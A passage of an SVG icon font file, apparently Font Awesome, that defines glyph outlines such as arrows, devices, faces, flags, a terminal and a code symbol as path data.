d="M1075 672q0 -13 -10 -23l-466 -466q-10 -10 -23 -10t-23 10l-466 466q-10 10 -10 23t10 23l50 50q10 10 23 10t23 -10l393 -393l393 393q10 10 23 10t23 -10l50 -50q10 -10 10 -23zM1075 1056q0 -13 -10 -23l-466 -466q-10 -10 -23 -10t-23 10l-466 466q-10 10 -10 23
t10 23l50 50q10 10 23 10t23 -10l393 -393l393 393q10 10 23 10t23 -10l50 -50q10 -10 10 -23z" />
    <glyph glyph-name="angle_left" unicode="&#xf104;" horiz-adv-x="640" 
d="M627 992q0 -13 -10 -23l-393 -393l393 -393q10 -10 10 -23t-10 -23l-50 -50q-10 -10 -23 -10t-23 10l-466 466q-10 10 -10 23t10 23l466 466q10 10 23 10t23 -10l50 -50q10 -10 10 -23z" />
    <glyph glyph-name="angle_right" unicode="&#xf105;" horiz-adv-x="640" 
d="M595 576q0 -13 -10 -23l-466 -466q-10 -10 -23 -10t-23 10l-50 50q-10 10 -10 23t10 23l393 393l-393 393q-10 10 -10 23t10 23l50 50q10 10 23 10t23 -10l466 -466q10 -10 10 -23z" />
    <glyph glyph-name="angle_up" unicode="&#xf106;" horiz-adv-x="1152" 
d="M1075 352q0 -13 -10 -23l-50 -50q-10 -10 -23 -10t-23 10l-393 393l-393 -393q-10 -10 -23 -10t-23 10l-50 50q-10 10 -10 23t10 23l466 466q10 10 23 10t23 -10l466 -466q10 -10 10 -23z" />
    <glyph glyph-name="angle_down" unicode="&#xf107;" horiz-adv-x="1152" 
d="M1075 800q0 -13 -10 -23l-466 -466q-10 -10 -23 -10t-23 10l-466 466q-10 10 -10 23t10 23l50 50q10 10 23 10t23 -10l393 -393l393 393q10 10 23 10t23 -10l50 -50q10 -10 10 -23z" />
    <glyph glyph-name="desktop" unicode="&#xf108;" horiz-adv-x="1920" 
d="M1792 544v832q0 13 -9.5 22.5t-22.5 9.5h-1600q-13 0 -22.5 -9.5t-9.5 -22.5v-832q0 -13 9.5 -22.5t22.5 -9.5h1600q13 0 22.5 9.5t9.5 22.5zM1920 1376v-1088q0 -66 -47 -113t-113 -47h-544q0 -37 16 -77.5t32 -71t16 -43.5q0 -26 -19 -45t-45 -19h-512q-26 0 -45 19
t-19 45q0 14 16 44t32 70t16 78h-544q-66 0 -113 47t-47 113v1088q0 66 47 113t113 47h1600q66 0 113 -47t47 -113z" />
    <glyph glyph-name="laptop" unicode="&#xf109;" horiz-adv-x="1920" 
d="M416 256q-66 0 -113 47t-47 113v704q0 66 47 113t113 47h1088q66 0 113 -47t47 -113v-704q0 -66 -47 -113t-113 -47h-1088zM384 1120v-704q0 -13 9.5 -22.5t22.5 -9.5h1088q13 0 22.5 9.5t9.5 22.5v704q0 13 -9.5 22.5t-22.5 9.5h-1088q-13 0 -22.5 -9.5t-9.5 -22.5z
M1760 192h160v-96q0 -40 -47 -68t-113 -28h-1600q-66 0 -113 28t-47 68v96h160h1600zM1040 96q16 0 16 16t-16 16h-160q-16 0 -16 -16t16 -16h160z" />
    <glyph glyph-name="tablet" unicode="&#xf10a;" horiz-adv-x="1152" 
d="M640 128q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1024 288v960q0 13 -9.5 22.5t-22.5 9.5h-832q-13 0 -22.5 -9.5t-9.5 -22.5v-960q0 -13 9.5 -22.5t22.5 -9.5h832q13 0 22.5 9.5t9.5 22.5zM1152 1248v-1088q0 -66 -47 -113t-113 -47h-832
q-66 0 -113 47t-47 113v1088q0 66 47 113t113 47h832q66 0 113 -47t47 -113z" />
    <glyph glyph-name="mobile_phone" unicode="&#xf10b;" horiz-adv-x="768" 
d="M464 128q0 33 -23.5 56.5t-56.5 23.5t-56.5 -23.5t-23.5 -56.5t23.5 -56.5t56.5 -23.5t56.5 23.5t23.5 56.5zM672 288v704q0 13 -9.5 22.5t-22.5 9.5h-512q-13 0 -22.5 -9.5t-9.5 -22.5v-704q0 -13 9.5 -22.5t22.5 -9.5h512q13 0 22.5 9.5t9.5 22.5zM480 1136
q0 16 -16 16h-160q-16 0 -16 -16t16 -16h160q16 0 16 16zM768 1152v-1024q0 -52 -38 -90t-90 -38h-512q-52 0 -90 38t-38 90v1024q0 52 38 90t90 38h512q52 0 90 -38t38 -90z" />
    <glyph glyph-name="circle_blank" unicode="&#xf10c;" 
d="M768 1184q-148 0 -273 -73t-198 -198t-73 -273t73 -273t198 -198t273 -73t273 73t198 198t73 273t-73 273t-198 198t-273 73zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103
t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="quote_left" unicode="&#xf10d;" horiz-adv-x="1664" 
d="M768 576v-384q0 -80 -56 -136t-136 -56h-384q-80 0 -136 56t-56 136v704q0 104 40.5 198.5t109.5 163.5t163.5 109.5t198.5 40.5h64q26 0 45 -19t19 -45v-128q0 -26 -19 -45t-45 -19h-64q-106 0 -181 -75t-75 -181v-32q0 -40 28 -68t68 -28h224q80 0 136 -56t56 -136z
M1664 576v-384q0 -80 -56 -136t-136 -56h-384q-80 0 -136 56t-56 136v704q0 104 40.5 198.5t109.5 163.5t163.5 109.5t198.5 40.5h64q26 0 45 -19t19 -45v-128q0 -26 -19 -45t-45 -19h-64q-106 0 -181 -75t-75 -181v-32q0 -40 28 -68t68 -28h224q80 0 136 -56t56 -136z" />
    <glyph glyph-name="quote_right" unicode="&#xf10e;" horiz-adv-x="1664" 
d="M768 1216v-704q0 -104 -40.5 -198.5t-109.5 -163.5t-163.5 -109.5t-198.5 -40.5h-64q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h64q106 0 181 75t75 181v32q0 40 -28 68t-68 28h-224q-80 0 -136 56t-56 136v384q0 80 56 136t136 56h384q80 0 136 -56t56 -136zM1664 1216
v-704q0 -104 -40.5 -198.5t-109.5 -163.5t-163.5 -109.5t-198.5 -40.5h-64q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h64q106 0 181 75t75 181v32q0 40 -28 68t-68 28h-224q-80 0 -136 56t-56 136v384q0 80 56 136t136 56h384q80 0 136 -56t56 -136z" />
    <glyph glyph-name="spinner" unicode="&#xf110;" horiz-adv-x="1792" 
d="M526 142q0 -53 -37.5 -90.5t-90.5 -37.5q-52 0 -90 38t-38 90q0 53 37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1024 -64q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM320 640q0 -53 -37.5 -90.5t-90.5 -37.5
t-90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1522 142q0 -52 -38 -90t-90 -38q-53 0 -90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM558 1138q0 -66 -47 -113t-113 -47t-113 47t-47 113t47 113t113 47t113 -47t47 -113z
M1728 640q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1088 1344q0 -80 -56 -136t-136 -56t-136 56t-56 136t56 136t136 56t136 -56t56 -136zM1618 1138q0 -93 -66 -158.5t-158 -65.5q-93 0 -158.5 65.5t-65.5 158.5
q0 92 65.5 158t158.5 66q92 0 158 -66t66 -158z" />
    <glyph glyph-name="circle" unicode="&#xf111;" 
d="M1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="reply" unicode="&#xf112;" horiz-adv-x="1792" 
d="M1792 416q0 -166 -127 -451q-3 -7 -10.5 -24t-13.5 -30t-13 -22q-12 -17 -28 -17q-15 0 -23.5 10t-8.5 25q0 9 2.5 26.5t2.5 23.5q5 68 5 123q0 101 -17.5 181t-48.5 138.5t-80 101t-105.5 69.5t-133 42.5t-154 21.5t-175.5 6h-224v-256q0 -26 -19 -45t-45 -19t-45 19
l-512 512q-19 19 -19 45t19 45l512 512q19 19 45 19t45 -19t19 -45v-256h224q713 0 875 -403q53 -134 53 -333z" />
    <glyph glyph-name="github_alt" unicode="&#xf113;" horiz-adv-x="1664" 
d="M640 320q0 -40 -12.5 -82t-43 -76t-72.5 -34t-72.5 34t-43 76t-12.5 82t12.5 82t43 76t72.5 34t72.5 -34t43 -76t12.5 -82zM1280 320q0 -40 -12.5 -82t-43 -76t-72.5 -34t-72.5 34t-43 76t-12.5 82t12.5 82t43 76t72.5 34t72.5 -34t43 -76t12.5 -82zM1440 320
q0 120 -69 204t-187 84q-41 0 -195 -21q-71 -11 -157 -11t-157 11q-152 21 -195 21q-118 0 -187 -84t-69 -204q0 -88 32 -153.5t81 -103t122 -60t140 -29.5t149 -7h168q82 0 149 7t140 29.5t122 60t81 103t32 153.5zM1664 496q0 -207 -61 -331q-38 -77 -105.5 -133t-141 -86
t-170 -47.5t-171.5 -22t-167 -4.5q-78 0 -142 3t-147.5 12.5t-152.5 30t-137 51.5t-121 81t-86 115q-62 123 -62 331q0 237 136 396q-27 82 -27 170q0 116 51 218q108 0 190 -39.5t189 -123.5q147 35 309 35q148 0 280 -32q105 82 187 121t189 39q51 -102 51 -218
q0 -87 -27 -168q136 -160 136 -398z" />
    <glyph glyph-name="folder_close_alt" unicode="&#xf114;" horiz-adv-x="1664" 
d="M1536 224v704q0 40 -28 68t-68 28h-704q-40 0 -68 28t-28 68v64q0 40 -28 68t-68 28h-320q-40 0 -68 -28t-28 -68v-960q0 -40 28 -68t68 -28h1216q40 0 68 28t28 68zM1664 928v-704q0 -92 -66 -158t-158 -66h-1216q-92 0 -158 66t-66 158v960q0 92 66 158t158 66h320
q92 0 158 -66t66 -158v-32h672q92 0 158 -66t66 -158z" />
    <glyph glyph-name="folder_open_alt" unicode="&#xf115;" horiz-adv-x="1920" 
d="M1781 605q0 35 -53 35h-1088q-40 0 -85.5 -21.5t-71.5 -52.5l-294 -363q-18 -24 -18 -40q0 -35 53 -35h1088q40 0 86 22t71 53l294 363q18 22 18 39zM640 768h768v160q0 40 -28 68t-68 28h-576q-40 0 -68 28t-28 68v64q0 40 -28 68t-68 28h-320q-40 0 -68 -28t-28 -68
v-853l256 315q44 53 116 87.5t140 34.5zM1909 605q0 -62 -46 -120l-295 -363q-43 -53 -116 -87.5t-140 -34.5h-1088q-92 0 -158 66t-66 158v960q0 92 66 158t158 66h320q92 0 158 -66t66 -158v-32h544q92 0 158 -66t66 -158v-160h192q54 0 99 -24.5t67 -70.5q15 -32 15 -68z
" />
    <glyph glyph-name="expand_alt" unicode="&#xf116;" horiz-adv-x="1792" 
 />
    <glyph glyph-name="collapse_alt" unicode="&#xf117;" horiz-adv-x="1792" 
 />
    <glyph glyph-name="smile" unicode="&#xf118;" 
d="M1134 461q-37 -121 -138 -195t-228 -74t-228 74t-138 195q-8 25 4 48.5t38 31.5q25 8 48.5 -4t31.5 -38q25 -80 92.5 -129.5t151.5 -49.5t151.5 49.5t92.5 129.5q8 26 32 38t49 4t37 -31.5t4 -48.5zM640 896q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5
t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1152 896q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1408 640q0 130 -51 248.5t-136.5 204t-204 136.5t-248.5 51t-248.5 -51t-204 -136.5t-136.5 -204t-51 -248.5
t51 -248.5t136.5 -204t204 -136.5t248.5 -51t248.5 51t204 136.5t136.5 204t51 248.5zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="frown" unicode="&#xf119;" 
d="M1134 307q8 -25 -4 -48.5t-37 -31.5t-49 4t-32 38q-25 80 -92.5 129.5t-151.5 49.5t-151.5 -49.5t-92.5 -129.5q-8 -26 -31.5 -38t-48.5 -4q-26 8 -38 31.5t-4 48.5q37 121 138 195t228 74t228 -74t138 -195zM640 896q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5
t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1152 896q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1408 640q0 130 -51 248.5t-136.5 204t-204 136.5t-248.5 51t-248.5 -51t-204 -136.5t-136.5 -204
t-51 -248.5t51 -248.5t136.5 -204t204 -136.5t248.5 -51t248.5 51t204 136.5t136.5 204t51 248.5zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="meh" unicode="&#xf11a;" 
d="M1152 448q0 -26 -19 -45t-45 -19h-640q-26 0 -45 19t-19 45t19 45t45 19h640q26 0 45 -19t19 -45zM640 896q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1152 896q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5
t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1408 640q0 130 -51 248.5t-136.5 204t-204 136.5t-248.5 51t-248.5 -51t-204 -136.5t-136.5 -204t-51 -248.5t51 -248.5t136.5 -204t204 -136.5t248.5 -51t248.5 51t204 136.5t136.5 204t51 248.5zM1536 640
q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="gamepad" unicode="&#xf11b;" horiz-adv-x="1920" 
d="M832 448v128q0 14 -9 23t-23 9h-192v192q0 14 -9 23t-23 9h-128q-14 0 -23 -9t-9 -23v-192h-192q-14 0 -23 -9t-9 -23v-128q0 -14 9 -23t23 -9h192v-192q0 -14 9 -23t23 -9h128q14 0 23 9t9 23v192h192q14 0 23 9t9 23zM1408 384q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5
t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1664 640q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1920 512q0 -212 -150 -362t-362 -150q-192 0 -338 128h-220q-146 -128 -338 -128q-212 0 -362 150
t-150 362t150 362t362 150h896q212 0 362 -150t150 -362z" />
    <glyph glyph-name="keyboard" unicode="&#xf11c;" horiz-adv-x="1920" 
d="M384 368v-96q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16h96q16 0 16 -16zM512 624v-96q0 -16 -16 -16h-224q-16 0 -16 16v96q0 16 16 16h224q16 0 16 -16zM384 880v-96q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16h96q16 0 16 -16zM1408 368v-96q0 -16 -16 -16
h-864q-16 0 -16 16v96q0 16 16 16h864q16 0 16 -16zM768 624v-96q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16h96q16 0 16 -16zM640 880v-96q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16h96q16 0 16 -16zM1024 624v-96q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16
h96q16 0 16 -16zM896 880v-96q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16h96q16 0 16 -16zM1280 624v-96q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16h96q16 0 16 -16zM1664 368v-96q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16h96q16 0 16 -16zM1152 880v-96
q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16h96q16 0 16 -16zM1408 880v-96q0 -16 -16 -16h-96q-16 0 -16 16v96q0 16 16 16h96q16 0 16 -16zM1664 880v-352q0 -16 -16 -16h-224q-16 0 -16 16v96q0 16 16 16h112v240q0 16 16 16h96q16 0 16 -16zM1792 128v896h-1664v-896
h1664zM1920 1024v-896q0 -53 -37.5 -90.5t-90.5 -37.5h-1664q-53 0 -90.5 37.5t-37.5 90.5v896q0 53 37.5 90.5t90.5 37.5h1664q53 0 90.5 -37.5t37.5 -90.5z" />
    <glyph glyph-name="flag_alt" unicode="&#xf11d;" horiz-adv-x="1792" 
d="M1664 491v616q-169 -91 -306 -91q-82 0 -145 32q-100 49 -184 76.5t-178 27.5q-173 0 -403 -127v-599q245 113 433 113q55 0 103.5 -7.5t98 -26t77 -31t82.5 -39.5l28 -14q44 -22 101 -22q120 0 293 92zM320 1280q0 -35 -17.5 -64t-46.5 -46v-1266q0 -14 -9 -23t-23 -9
h-64q-14 0 -23 9t-9 23v1266q-29 17 -46.5 46t-17.5 64q0 53 37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1792 1216v-763q0 -39 -35 -57q-10 -5 -17 -9q-218 -116 -369 -116q-88 0 -158 35l-28 14q-64 33 -99 48t-91 29t-114 14q-102 0 -235.5 -44t-228.5 -102
q-15 -9 -33 -9q-16 0 -32 8q-32 19 -32 56v742q0 35 31 55q35 21 78.5 42.5t114 52t152.5 49.5t155 19q112 0 209 -31t209 -86q38 -19 89 -19q122 0 310 112q22 12 31 17q31 16 62 -2q31 -20 31 -55z" />
    <glyph glyph-name="flag_checkered" unicode="&#xf11e;" horiz-adv-x="1792" 
d="M832 536v192q-181 -16 -384 -117v-185q205 96 384 110zM832 954v197q-172 -8 -384 -126v-189q215 111 384 118zM1664 491v184q-235 -116 -384 -71v224q-20 6 -39 15q-5 3 -33 17t-34.5 17t-31.5 15t-34.5 15.5t-32.5 13t-36 12.5t-35 8.5t-39.5 7.5t-39.5 4t-44 2
q-23 0 -49 -3v-222h19q102 0 192.5 -29t197.5 -82q19 -9 39 -15v-188q42 -17 91 -17q120 0 293 92zM1664 918v189q-169 -91 -306 -91q-45 0 -78 8v-196q148 -42 384 90zM320 1280q0 -35 -17.5 -64t-46.5 -46v-1266q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v1266
q-29 17 -46.5 46t-17.5 64q0 53 37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1792 1216v-763q0 -39 -35 -57q-10 -5 -17 -9q-218 -116 -369 -116q-88 0 -158 35l-28 14q-64 33 -99 48t-91 29t-114 14q-102 0 -235.5 -44t-228.5 -102q-15 -9 -33 -9q-16 0 -32 8
q-32 19 -32 56v742q0 35 31 55q35 21 78.5 42.5t114 52t152.5 49.5t155 19q112 0 209 -31t209 -86q38 -19 89 -19q122 0 310 112q22 12 31 17q31 16 62 -2q31 -20 31 -55z" />
    <glyph glyph-name="terminal" unicode="&#xf120;" horiz-adv-x="1664" 
d="M585 553l-466 -466q-10 -10 -23 -10t-23 10l-50 50q-10 10 -10 23t10 23l393 393l-393 393q-10 10 -10 23t10 23l50 50q10 10 23 10t23 -10l466 -466q10 -10 10 -23t-10 -23zM1664 96v-64q0 -14 -9 -23t-23 -9h-960q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h960q14 0 23 -9
t9 -23z" />
    <glyph glyph-name="code" unicode="&#xf121;" horiz-adv-x="1920" 
d="M617 137l-50 -50q-10 -10 -23 -10t-23 10l-466 466q-10 10 -10 23t10 23l466 466q10 10 23 10t23 -10l50 -50q10 -10 10 -23t-10 -23l-393 -393l393 -393q10 -10 10 -23t-10 -23zM1208 1204l-373 -1291q-4 -13 -15.5 -19.5t-23.5 -2.5l-62 17q-13 4 -19.5 15.5t-2.5 24.5
l373 1291q4 13 15.5 19.5t23.5 2.5l62 -17q13 -4 19.5 -15.5t2.5 -24.5zM1865 553l-466 -466q-10 -10 -23 -10t-23 10l-50 50q-10 10 -10 23t10 23l393 393l-393 393q-10 10 -10 23t10 23l50 50q10 10 23 10t23 -10l466 -466q10 -10 10 -23t-10 -23z" />
    <glyph glyph-name="reply_all" unicode="&#xf122;" horiz-adv-x="1792" 
d="M640 454v-70q0 -42 -39 -59q-13 -5 -25 -5q-27 0 -45 19l-512 512q-19 19 -19 45t19 45l512 512q29 31 70 14q39 -17 39 -59v-69l-397 -398q-19 -19 -19 -45t19 -45zM1792 416q0 -58 -17 -133.5t-38.5 -138t-48 -125t-40.5 -90.5l-20 -40q-8 -17 -28 -17q-6 0 -9 1
q-25 8 -23 34q43 400 -106 565q-64 71 -170.5 110.5t-267.5 52.5v-251q0 -42 -39 -59q-13 -5 -25 -5q-27 0 -45 19l-512 512q-19 19 -19 45t19 45l512 512q29 31 70 14q39 -17 39 -59v-262q411 -28 599 -221q169 -173 169 -509z" />
    <glyph glyph-name="star_half_empty" unicode="&#xf123;" horiz-adv-x="1664" 
d="M1186 579l257 250l-356 52l-66 10l-30 60l-159 322v-963l59 -31l318 -168l-60 355l-12 66zM1638 841l-363 -354l86 -500q5 -33 -6 -51.5t-34 -18.5q-17 0 -40 12l-449 236l-449 -236q-23 -12 -40 -12q-23 0 -34 18.5t-6 51.5l86 500l-364 354q-32 32 -23 59.5t54 34.5
l502 73l225 455q20 41 49 41q28 0 49 -41l225 -455l502 -73q45 -7 54 -34.5t-24 -59.5z" />
    <glyph glyph-name="location_arrow" unicode="&#xf124;" horiz-adv-x="1408" 
d="M1401 1187l-640 -1280q-17 -35 -57 -35q-5 0 -15 2q-22 5 -35.5 22.5t-13.5 39.5v576h-576q-22 0 -39.5 13.5t-22.5 35.5t4 42t29 30l1280 640q13 7 29 7q27 0 45 -19q15 -14 18.5 -34.5t-6.5 -39.5z" />
    <glyph glyph-name="crop" unicode="&#xf125;" horiz-adv-x="1664" 
d="M557 256h595v595zM512 301l595 595h-595v-595zM1664 224v-192q0 -14 -9 -23t-23 -9h-224v-224q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v224h-864q-14 0 -23 9t-9 23v864h-224q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h224v224q0 14 9 23t23 9h192q14 0 23 -9t9 -23
v-224h851l246 247q10 9 23 9t23 -9q9 -10 9 -23t-9 -23l-247 -246v-851h224q14 0 23 -9t9 -23z" />
    <glyph glyph-name="code_fork" unicode="&#xf126;" horiz-adv-x="1024" 
d="M288 64q0 40 -28 68t-68 28t-68 -28t-28 -68t28 -68t68 -28t68 28t28 68zM288 1216q0 40 -28 68t-68 28t-68 -28t-28 -68t28 -68t68 -28t68 28t28 68zM928 1088q0 40 -28 68t-68 28t-68 -28t-28 -68t28 -68t68 -28t68 28t28 68zM1024 1088q0 -52 -26 -96.5t-70 -69.5
q-2 -287 -226 -414q-67 -38 -203 -81q-128 -40 -169.5 -71t-41.5 -100v-26q44 -25 70 -69.5t26 -96.5q0 -80 -56 -136t-136 -56t-136 56t-56 136q0 52 26 96.5t70 69.5v820q-44 25 -70 69.5t-26 96.5q0 80 56 136t136 56t136 -56t56 -136q0 -52 -26 -96.5t-70 -69.5v-497
q54 26 154 57q55 17 87.5 29.5t70.5 31t59 39.5t40.5 51t28 69.5t8.5 91.5q-44 25 -70 69.5t-26 96.5q0 80 56 136t136 56t136 -56t56 -136z" />
    <glyph glyph-name="unlink" unicode="&#xf127;" horiz-adv-x="1664" 
d="M439 265l-256 -256q-11 -9 -23 -9t-23 9q-9 10 -9 23t9 23l256 256q10 9 23 9t23 -9q9 -10 9 -23t-9 -23zM608 224v-320q0 -14 -9 -23t-23 -9t-23 9t-9 23v320q0 14 9 23t23 9t23 -9t9 -23zM384 448q0 -14 -9 -23t-23 -9h-320q-14 0 -23 9t-9 23t9 23t23 9h320
q14 0 23 -9t9 -23zM1648 320q0 -120 -85 -203l-147 -146q-83 -83 -203 -83q-121 0 -204 85l-334 335q-21 21 -42 56l239 18l273 -274q27 -27 68 -27.5t68 26.5l147 146q28 28 28 67q0 40 -28 68l-274 275l18 239q35 -21 56 -42l336 -336q84 -86 84 -204zM1031 1044l-239 -18
l-273 274q-28 28 -68 28q-39 0 -68 -27l-147 -146q-28 -28 -28 -67q0 -40 28 -68l274 -274l-18 -240q-35 21 -56 42l-336 336q-84 86 -84 204q0 120 85 203l147 146q83 83 203 83q121 0 204 -85l334 -335q21 -21 42 -56zM1664 960q0 -14 -9 -23t-23 -9h-320q-14 0 -23 9
t-9 23t9 23t23 9h320q14 0 23 -9t9 -23zM1120 1504v-320q0 -14 -9 -23t-23 -9t-23 9t-9 23v320q0 14 9 23t23 9t23 -9t9 -23zM1527 1353l-256 -256q-11 -9 -23 -9t-23 9q-9 10 -9 23t9 23l256 256q10 9 23 9t23 -9q9 -10 9 -23t-9 -23z" />
    <glyph glyph-name="question" unicode="&#xf128;" horiz-adv-x="1024" 
d="M704 280v-240q0 -16 -12 -28t-28 -12h-240q-16 0 -28 12t-12 28v240q0 16 12 28t28 12h240q16 0 28 -12t12 -28zM1020 880q0 -54 -15.5 -101t-35 -76.5t-55 -59.5t-57.5 -43.5t-61 -35.5q-41 -23 -68.5 -65t-27.5 -67q0 -17 -12 -32.5t-28 -15.5h-240q-15 0 -25.5 18.5
t-10.5 37.5v45q0 83 65 156.5t143 108.5q59 27 84 56t25 76q0 42 -46.5 74t-107.5 32q-65 0 -108 -29q-35 -25 -107 -115q-13 -16 -31 -16q-12 0 -25 8l-164 125q-13 10 -15.5 25t5.5 28q160 266 464 266q80 0 161 -31t146 -83t106 -127.5t41 -158.5z" />
    <glyph glyph-name="_279" unicode="&#xf129;" horiz-adv-x="640" 
d="M640 192v-128q0 -26 -19 -45t-45 -19h-512q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h64v384h-64q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h384q26 0 45 -19t19 -45v-576h64q26 0 45 -19t19 -45zM512 1344v-192q0 -26 -19 -45t-45 -19h-256q-26 0 -45 19t-19 45v192
q0 26 19 45t45 19h256q26 0 45 -19t19 -45z" />
    <glyph glyph-name="exclamation" unicode="&#xf12a;" horiz-adv-x="640" 
d="M512 288v-224q0 -26 -19 -45t-45 -19h-256q-26 0 -45 19t-19 45v224q0 26 19 45t45 19h256q26 0 45 -19t19 -45zM542 1344l-28 -768q-1 -26 -20.5 -45t-45.5 -19h-256q-26 0 -45.5 19t-20.5 45l-28 768q-1 26 17.5 45t44.5 19h320q26 0 44.5 -19t17.5 -45z" />
    <glyph glyph-name="superscript" unicode="&#xf12b;" 
d="M897 167v-167h-248l-159 252l-24 42q-8 9 -11 21h-3q-1 -3 -2.5 -6.5t-3.5 -8t-3 -6.5q-10 -20 -25 -44l-155 -250h-258v167h128l197 291l-185 272h-137v168h276l139 -228q2 -4 23 -42q8 -9 11 -21h3q3 9 11 21l25 42l140 228h257v-168h-125l-184 -267l204 -296h109z
M1534 846v-206h-514l-3 27q-4 28 -4 46q0 64 26 117t65 86.5t84 65t84 54.5t65 54t26 64q0 38 -29.5 62.5t-70.5 24.5q-51 0 -97 -39q-14 -11 -36 -38l-105 92q26 37 63 66q83 65 188 65q110 0 178 -59.5t68 -158.5q0 -56 -24.5 -103t-62 -76.5t-81.5 -58.5t-82 -50.5
t-65.5 -51.5t-30.5 -63h232v80h126z" />
    <glyph glyph-name="subscript" unicode="&#xf12c;" 
d="M897 167v-167h-248l-159 252l-24 42q-8 9 -11 21h-3q-1 -3 -2.5 -6.5t-3.5 -8t-3 -6.5q-10 -20 -25 -44l-155 -250h-258v167h128l197 291l-185 272h-137v168h276l139 -228q2 -4 23 -42q8 -9 11 -21h3q3 9 11 21l25 42l140 228h257v-168h-125l-184 -267l204 -296h109z
M1536 -50v-206h-514l-4 27q-3 45 -3 46q0 64 26 117t65 86.5t84 65t84 54.5t65 54t26 64q0 38 -29.5 62.5t-70.5 24.5q-51 0 -97 -39q-14 -11 -36 -38l-105 92q26 37 63 66q80 65 188 65q110 0 178 -59.5t68 -158.5q0 -66 -34.5 -118.5t-84 -86t-99.5 -62.5t-87 -63t-41 -73
h232v80h126z" />
    <glyph glyph-name="_283" unicode="&#xf12d;" horiz-adv-x="1920" 
d="M896 128l336 384h-768l-336 -384h768zM1909 1205q15 -34 9.5 -71.5t-30.5 -65.5l-896 -1024q-38 -44 -96 -44h-768q-38 0 -69.5 20.5t-47.5 54.5q-15 34 -9.5 71.5t30.5 65.5l896 1024q38 44 96 44h768q38 0 69.5 -20.5t47.5 -54.5z" />
    <glyph glyph-name="puzzle_piece" unicode="&#xf12e;" horiz-adv-x="1664" 
d="M1664 438q0 -81 -44.5 -135t-123.5 -54q-41 0 -77.5 17.5t-59 38t-56.5 38t-71 17.5q-110 0 -110 -124q0 -39 16 -115t15 -115v-5q-22 0 -33 -1q-34 -3 -97.5 -11.5t-115.5 -13.5t-98 -5q-61 0 -103 26.5t-42 83.5q0 37 17.5 71t38 56.5t38 59t17.5 77.5q0 79 -54 123.5
t-135 44.5q-84 0 -143 -45.5t-59 -127.5q0 -43 15 -83t33.5 -64.5t33.5 -53t15 -50.5q0 -45 -46 -89q-37 -35 -117 -35q-95 0 -245 24q-9 2 -27.5 4t-27.5 4l-13 2q-1 0 -3 1q-2 0 -2 1v1024q2 -1 17.5 -3.5t34 -5t21.5 -3.5q150 -24 245 -24q80 0 117 35q46 44 46 89
